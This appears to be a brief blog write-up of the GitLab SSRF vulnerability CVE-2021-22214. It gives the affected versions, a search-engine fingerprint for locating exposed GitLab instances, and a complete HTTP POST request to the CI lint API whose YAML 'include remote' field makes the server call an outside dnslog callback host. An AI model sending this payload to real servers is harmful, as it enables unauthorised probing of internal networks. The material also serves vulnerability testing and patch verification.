Gitlab Ssrf Vulnerability Cve 2021 22214
Gitlab Ssrf Vulnerability Cve 2021 22214
GitLab SSRF Vulnerability CVE-2021-22214
Vulnerability Description
GitLab has a foreground unauthorized SSRF vulnerability, which can also be used by unauthorized attackers to perform SSRF attacks (CVE-2021-22214).
Vulnerability Impact
Gitlab > 10.5
Network surveying and mapping
app=”GitLab”
Environment construction
Vulnerability reappears
The login page is as follows
Send a request packet
POST /api/v4/ci/lint HTTP/1.1
Host:
User-Agent: python-requests/2.25.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/json
Content-Length: 111
{"include_merged_yaml": true, "content": "include:\n remote: https://965qaw.dnslog.cn/api/v1/targets?test.yml"}
This post is licensed under CC BY 4.0 by the author.